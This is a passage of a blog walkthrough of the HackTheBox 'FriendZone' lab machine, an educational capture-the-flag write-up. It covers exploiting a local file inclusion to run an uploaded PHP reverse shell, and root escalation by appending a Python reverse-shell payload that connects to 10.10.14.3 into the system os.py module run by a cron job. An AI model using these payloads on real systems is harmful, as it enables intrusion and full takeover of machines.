src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-smart-photos.png" alt="smart photos" /></p><p>I filled the parameters <code class="language-plaintext highlighter-rouge">image_id</code> and <code class="language-plaintext highlighter-rouge">pagename</code> with the filename and timestamp I’v got in response when I uploaded an image in <a href="#uploadsfriendzonered">uploads.friendzone.red</a>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-smart-photos-bug.png" alt="bug" /></p><p>I replaced <code class="language-plaintext highlighter-rouge">image_id</code>’s value by <code class="language-plaintext highlighter-rouge">a.jpg</code> and I got this result:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-haha.png" alt="haha" /></p><p>I replaced <code class="language-plaintext highlighter-rouge">image_id</code>’s value by <code class="language-plaintext highlighter-rouge">b.jpg</code> <em>(which is the other image in <code class="language-plaintext highlighter-rouge">/images</code> folder)</em> and <code class="language-plaintext highlighter-rouge">pagename</code>’s value by <code class="language-plaintext highlighter-rouge">timestamp</code>. I got this result: <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-timestamp.png" alt="haha" /></p><p>I replaced <code class="language-plaintext highlighter-rouge">pagename</code>’s value by <code class="language-plaintext highlighter-rouge">dashboard</code> and the page was continuously including itself:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/admin1-double-inclusion.png" alt="haha" /></p><p>This is a <strong>LFI</strong>(<strong>L</strong>ocale <strong>F</strong>ile <strong>I</strong>nclusion) vulnerability!</p><hr /><h2 id="assembling-pieces">Assembling pieces</h2><p>So far, we noticed that:</p><ul><li>We can write files in <code class="language-plaintext highlighter-rouge">Development</code> shared directory. (See <a href="#smb-ports-139--445">smb</a> chapter)</li><li>We can read php pages from <code class="language-plaintext highlighter-rouge">https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&amp;pagename=&lt;PHP PAGE&gt;</code>.</li></ul><h3 id="reverse-shell">reverse shell</h3><p>Let’s try to upload a <a href="https://gist.github.com/rshipp/eee36684db07d234c1cc">tiny PHP reverse shell</a>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/smb-put.png" alt="smb put shell.php" /></p><p>Run a listener on our machine:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>nc <span class="nt">-lnvp</span> 1234
</pre></table></code></div></div><p>Then open it from <a href="https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&amp;pagename=../../../../../../../../../../../etc/Development/shell">https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&amp;pagename=../../../../../../../../../../../etc/Development/shell</a></p><p>BOUM!</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/reverse-shell.png" alt="reverse-shell" /> ___</p><h2 id="users-flag-friend">User’s flag (friend)</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">cd</span> /home
<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2018 <span class="nb">.</span>
drwxr-xr-x 22 root   root   4096 Oct  5  2018 ..
drwxr-xr-x  5 friend friend 4096 Jan 24  2019 friend
<span class="nv">$ </span><span class="nb">cd </span>friend
<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 36
drwxr-xr-x 5 friend friend 4096 Jan 24  2019 <span class="nb">.</span>
drwxr-xr-x 3 root   root   4096 Oct  5  2018 ..
lrwxrwxrwx 1 root   root      9 Jan 24  2019 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 friend friend  220 Oct  5  2018 .bash_logout
<span class="nt">-rw-r--r--</span> 1 friend friend 3771 Oct  5  2018 .bashrc
drwx------ 2 friend friend 4096 Oct  5  2018 .cache
drwx------ 3 friend friend 4096 Oct  6  2018 .gnupg
drwxrwxr-x 3 friend friend 4096 Oct  6  2018 .local
<span class="nt">-rw-r--r--</span> 1 friend friend  807 Oct  5  2018 .profile
<span class="nt">-rw-r--r--</span> 1 friend friend    0 Oct  5  2018 .sudo_as_admin_successful
<span class="nt">-r--r--r--</span> 1 root   root     33 Oct  6  2018 user.txt
<span class="nv">$ </span><span class="nb">cat </span>user.txt
a9ed20acecd6c5b6b52f474e15ae9a11
</pre></table></code></div></div><h2 id="privesc-to-root">Privesc to Root</h2><p><code class="language-plaintext highlighter-rouge">linpeas.sh</code> told me something interesting:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/linpeas-writable-files.png" alt="linpeas-writable-files" /></p><p>Since our current user has not high privileges, we’re running <a href="https://github.com/DominicBreuker/pspy">pspy</a> to identify cron jobs that we don’t have permission to see:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/pspy.png" alt="pspy" /></p><p><code class="language-plaintext highlighter-rouge">/opt/server_admin/reporter.py</code> seems to be executed from a cron job. We can read it:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 12
drwxr-xr-x 2 root root 4096 Jan 24  2019 <span class="nb">.</span>
drwxr-xr-x 3 root root 4096 Oct  6  2018 ..
<span class="nt">-rwxr--r--</span> 1 root root  424 Jan 16  2019 reporter.py
</pre></table></code></div></div><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python
</span>
<span class="kn">import</span> <span class="nn">os</span>

<span class="n">to_address</span> <span class="o">=</span> <span class="s">"admin1@friendzone.com"</span>
<span class="n">from_address</span> <span class="o">=</span> <span class="s">"admin2@friendzone.com"</span>

<span class="k">print</span> <span class="s">"[+] Trying to send email to %s"</span><span class="o">%</span><span class="n">to_address</span>

<span class="c1">#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
</span>
<span class="c1">#os.system(command)
</span>
<span class="c1"># I need to edit the script later
# Sam ~ python developer
</span><span class="n">www</span><span class="o">-</span><span class="n">data</span><span class="o">@</span><span class="n">FriendZone</span><span class="p">:</span><span class="o">/</span><span class="n">opt</span><span class="o">/</span><span class="n">server_admin</span><span class="err">$</span>
</pre></table></code></div></div><p>The script import <strong>os</strong> python’s module that we can edit. So we just have to edit it and put a malicious content in it:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span><span class="p">,</span><span class="n">subprocess</span><span class="p">,</span><span class="n">pty</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="s">"10.10.14.3"</span><span class="p">,</span><span class="mi">4242</span><span class="p">))</span>
<span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">)</span>
<span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span>
<span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span>
<span class="n">pty</span><span class="p">.</span><span class="n">spawn</span><span class="p">(</span><span class="s">"/bin/bash"</span><span class="p">)</span>
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">printf</span> <span class="s1">'\nimport socket,subprocess,pty\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("10.10.14.3",4242))\ndup2(s.fileno(),0)\ndup2(s.fileno(),1)\ndup2(s.fileno(),2)\npty.spawn("/bin/bash")\n'</span> <span class="o">&gt;&gt;</span> /usr/lib/python2.7/os.py
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/friendzone/root-flag.png" alt="root flag" /></p><ul><li>flag: <code class="language-plaintext highlighter-rouge">b0e6c60b82cf96e9855ac1656a9e90c7</code></li></ul><hr /><h2 id="useful-links">Useful links</h2><ul><li><a href="https://gist.github.com/rshipp/eee36684db07d234c1cc">tiny PHP reverse shell</a></li><li><a href="https://github.com/michenriksen/aquatone">aquatone - a tool for visual inspection of websites across a large amount of hosts</a></li><li><a href="https://github.com/DominicBreuker/pspy">pspy - unprivileged Linux process snooping</a></li><li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python">reverse shell python</a></li></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox-walkthroughs/'>Hackthebox walkthroughs</a>, <a href='/categories/linux/'>Linux</a>, <a href='/categories/easy/'>Easy</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb-linux-easy/" class="post-tag no-text-decoration" >htb-linux-easy</a> <a href="/tags/samba/" class="post-tag no-text-decoration" >samba</a> <a href="/tags/smbclient/" class="post-tag no-text-decoration" >smbclient</a> <a href="/tags/smbmap/" class="post-tag no-text-decoration" >smbmap</a> <a href="/tags/dns/" class="post-tag no-text-decoration" >DNS</a> <a href="/tags/zone-transfer/" class="post-tag no-text-decoration" >zone transfer</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >LFI</a> <a href="/tags/reverse-shell/" class="post-tag no-text-decoration" >reverse-shell</a> <a href="/tags/python-module-hijacking/" class="post-tag no-text-decoration" >python module hijacking</a> <a href="/tags/cron/" class="post-tag no-text-decoration" >cron</a> <a href="/tags/pspy/" class="post-tag no-text-decoration" >pspy</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/oscp-prep/" class="post-tag no-text-decoration" >oscp-prep</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox - FriendZone - amirr0r&url=https://amirr0r.github.io/posts/htb-friendzone/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - FriendZone - amirr0r&u=https://amirr0r.github.io/posts/htb-friendzone/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox - FriendZone - amirr0r&url=https://amirr0r.github.io/posts/htb-friendzone/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/crto-review/">CRTO Review (Certified Red Team Operator) & Notion Templates</a></li><li><a href="/posts/htb-forest/">HackTheBox - Forest</a></li><li><a href="/posts/oscp-review/">OSCP Review (Cheat Sheet, Tmux Enumeration Scripts and Notion Templates)</a></li><li><a href="/posts/oscp-prep/">How do I prepare for the OSCP?</a></li><li><a href="/posts/htb-valentine/">HackTheBox - Valentine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-networked/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 28, 2020 <i class="unloaded">2020-12-28T23:20:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Networked</h3><div class="text-muted small"><p> Foothold nmap scan $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Networked-full-port-scan.txt 10.10.10.146 Nmap scan report for 10.10.10.146 Host is up (0.14s latency). Not shown: 65532 f...</p></div></div></a></div><div class="card"> <a href="/posts/htb-tabby/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Mar 4, 2021 <i class="unloaded">2021-03-04T20:00:59+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Tabby</h3><div class="text-muted small"><p> Foothold nmap scan 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Tabby-full-port-scan.txt 10.10.10.194 PORT STATE SERVICE VERSION 22/tcp ope...</p></div></div></a></div><div class="card"> <a href="/posts/htb-lame/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 21, 2020 <i class="unloaded">2020-12-21T21:50:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Lame</h3><div class="text-muted small"><p> Foothold Nmap scan (open ports) FTP We can log in as anonymous: But there are no interesting files… Let’s check what we can enumerate on the other ports ! Samba I couldn’t get anything f...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/htb-frolic/" class="btn btn-outline-primary"><p>HackTheBox - Frolic</p></a> <a href="/posts/htb-postman/" class="btn btn-outline-primary"><p>HackTheBox - Postman</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//amirr0r-github-io.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://amirr0r.github.io/posts/htb-friendzone/'; this.page.identifier = '/posts/htb-friendzone/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://github.com/amirr0r">amirr0r</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://amirr0r.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
